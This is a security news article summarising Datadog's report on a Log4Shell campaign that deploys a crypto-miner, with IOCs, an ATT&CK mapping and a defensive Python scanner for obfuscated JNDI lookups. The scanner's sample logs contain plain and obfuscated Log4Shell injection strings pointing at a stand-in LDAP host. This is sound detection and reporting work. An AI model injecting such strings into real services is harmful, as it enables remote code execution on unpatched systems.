New Log4j Campaign Exploits Vulnerability for Crypto-Mining and System Compromise

On August 20, 2024, DataDog Security Labs released a comprehensive threat research report detailing a new opportunistic campaign leveraging the notorious Log4j vulnerability, also known as Log4Shell.

The original image was generated by OpenAI's DALL-E and edited by the author. Source: OpenAI (August 2024)

Introduction

On August 20, 2024, DataDog Security Labs released a comprehensive threat research report detailing a new opportunistic campaign leveraging the notorious Log4j vulnerability, also known as Log4Shell. Despite being over two years old, this vulnerability continues to pose significant risks, as demonstrated by this latest attack aimed at crypto-mining and establishing persistent system control.

Report Overview

The Log4Shell vulnerability (CVE-2021-44228) was first discovered on November 24, 2021, by security researcher Chen Zhaojun. This critical flaw in Apache Log4j, a widely used Java-based logging library, received the highest severity rating, a CVSS score of 10 out of 10. The vulnerability allows attackers to execute remote code, potentially compromising systems globally. Since its discovery, Log4Shell has been exploited by a range of threat actors, including nation-state groups such as APT41 and cybercriminals such as the Conti ransomware gang.

On July 30, 2024, a honeypot deployed by DataDog Security Labs received an exploitation probe from a Tor exit node (185.220.101[.]34). The probe, initially appearing to be a standard Log4Shell attack, was later identified as part of a new campaign involving the deployment of the XMRig cryptocurrency miner.

The attack chain begins with an obfuscated LDAP request designed to evade detection. The request leads to the execution of a malicious Java class that downloads and runs a script named "lte." This script conducts system reconnaissance, retrieves system information, and establishes persistence through various means, depending on user privileges. The script also sets up multiple backdoors, including a reverse shell and encrypted communication channels, allowing remote control of the compromised system.

The script's execution flow includes downloading the XMRig miner, configuring it for crypto-mining, and ensuring its persistence by setting up system services or cron jobs. The script exfiltrates detailed system information to a remote server and attempts to evade detection by clearing command history and removing traces of its presence.
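The obfuscated request mentioned above is what defeats naive matching on the literal string "jndi:ldap". As an added example (not code from the Datadog report or this article), the Python below unwinds nested Log4j lookup syntax in web-server log lines before matching, so case-changing (lower/upper) and default-value (:-) tricks no longer hide the JNDI lookup; every log line and hostname in it is constructed.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (not from the report). The User-Agent
# fields mimic nested/obfuscated lookup syntax used to hide "jndi:ldap://".
SAMPLE_LOG = """\
10.0.0.5 - - [30/Jul/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [30/Jul/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://ldap.example/a}"
10.0.0.9 - - [30/Jul/2024:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://ldap.example/a}"
10.0.0.9 - - [30/Jul/2024:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:${lower:LDAP}://ldap.example/a}"
10.0.0.7 - - [30/Jul/2024:10:00:05 +0000] "GET /price?x=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/8.0"
"""

# Innermost Log4j lookup: "${...}" whose body holds no further "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup, whatever the provider scheme (ldap, rmi, dns, ...) or case.
_JNDI = re.compile(r"jndi:[a-z]+://", re.I)

def _resolve_one(body: str) -> str:
    """Expand one non-nested lookup body: "prefix:X:-default" -> default (covers
    ${::-x}, ${env:UNSET:-x}); lower/upper -> case-changed X; anything else is kept."""
    if ":-" in body:
        return body.split(":-", 1)[1]
    kind, _, arg = body.partition(":")
    if kind.lower() == "lower":
        return arg.lower()
    if kind.lower() == "upper":
        return arg.upper()
    return body  # e.g. "jndi:ldap://..." or "date:yyyy" stay visible to the scanner

def normalize_lookups(text: str, max_depth: int = 16) -> str:
    """Collapse innermost lookups repeatedly until nested obfuscation unwinds."""
    for _ in range(max_depth):
        new = _INNER.sub(lambda m: _resolve_one(m.group(1)), text)
        if new == text:
            break
        text = new
    return text

def scan_log(log: str) -> List[Dict[str, str]]:
    """Return one hit per log line whose normalized form contains a JNDI lookup."""
    hits = []
    for line in log.splitlines():
        norm = normalize_lookups(line)
        if _JNDI.search(norm):
            hits.append({"line": line, "normalized": norm})
    return hits
```

The benign `${date:yyyy}` on the last sample line is collapsed but not flagged, which keeps the check from alerting on every `${` a log happens to contain.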

Insights and Analysis

The ongoing exploitation of Log4Shell in this campaign underscores the persistent threat posed by unpatched vulnerabilities. Organizations that have not yet applied mitigations for this vulnerability remain at risk of compromise, leading to potential data exfiltration, crypto-mining, and system control by malicious actors. The broader implications of this attack highlight the necessity for continuous monitoring and timely patching of known vulnerabilities.

The researchers at DataDog Security Labs emphasize the importance of not underestimating older vulnerabilities, as they continue to be exploited in new and evolving ways. This latest campaign serves as a reminder that opportunistic threat actors are constantly seeking unpatched systems to exploit for financial gain.

Organizations should prioritize the patching of the Log4Shell vulnerability if they haven't already done so. Additionally, implementing robust monitoring and detection capabilities is crucial to identifying and responding to such attacks promptly. Regularly reviewing and updating security controls, including those related to LDAP and JNDI, can further reduce the risk of exploitation.

The discovery of this new Log4j campaign by DataDog Security Labs illustrates the ongoing danger posed by unpatched vulnerabilities. The attack's sophisticated methods, including obfuscation, persistence mechanisms, and data exfiltration, highlight the need for vigilance in maintaining security hygiene. Organizations must act swiftly to mitigate these risks and protect their systems from similar threats.

Indicators of Compromise (IOC)

| Indicator | Type | Description |
|---|---|---|
| 185.220.101[.]34 | IP address | Known Tor exit node used to probe for Log4Shell exploitation. |
| superr[.]buzz | Domain | Domain involved in the LDAP request for the attack. |
| cmpnst[.]info | Domain | Domain used for XMRig cryptocurrency mining configuration. |
| nfdo[.]shop | Domain | Domain used to host malicious scripts and exfiltrate data. |
| e4edfa8c6891f6815c05e73852212207cc454a42496d1a109e750c660368b5c1 | File hash | Hash of the malicious script /tmp/lte. |
| 5441be217e98051c284d584e830f9a7fc2153143fafee0dc9f6af197cec6c8c9 | File hash | Hash of the binary /bin/rcd. |
| 2ac2877c9e4cd7d70673c0643eb16805977a9b8d55b6b2e5a6491db565cee1f | File hash | Hash of the cryptocurrency miner /bin/componist. |
| 4f11db82193aebe710585b2faefd2b904b6fe6636f7dc25541cea0dd31adada4 | File hash | Hash of the binary /bin/nfdo. |

MITRE ATT&CK Mapping

| Tactic | Technique | ID | Description |
|---|---|---|---|
| Execution | Command and Scripting Interpreter | T1059 | The script uses curl, wget, and perl to download and execute malicious commands. |
| Persistence | Create or Modify System Process | T1543.003 | The script creates systemd services or cron jobs for persistence. |
| Defense Evasion | Clear Command History | T1070.003 | The script clears bash history to avoid detection. |
| Exfiltration | Exfiltration Over Web Service | T1567.002 | The script exfiltrates data via HTTP POST requests using curl. |
| Command and Control | Encrypted Channel | T1573 | The script sets up an encrypted reverse shell using GPG for communication. |

References

- Datadog Security Labs, "The gift that keeps on giving: A new opportunistic Log4j campaign" (August 20, 2024).
- MITRE CVE Program, CVE-2021-44228.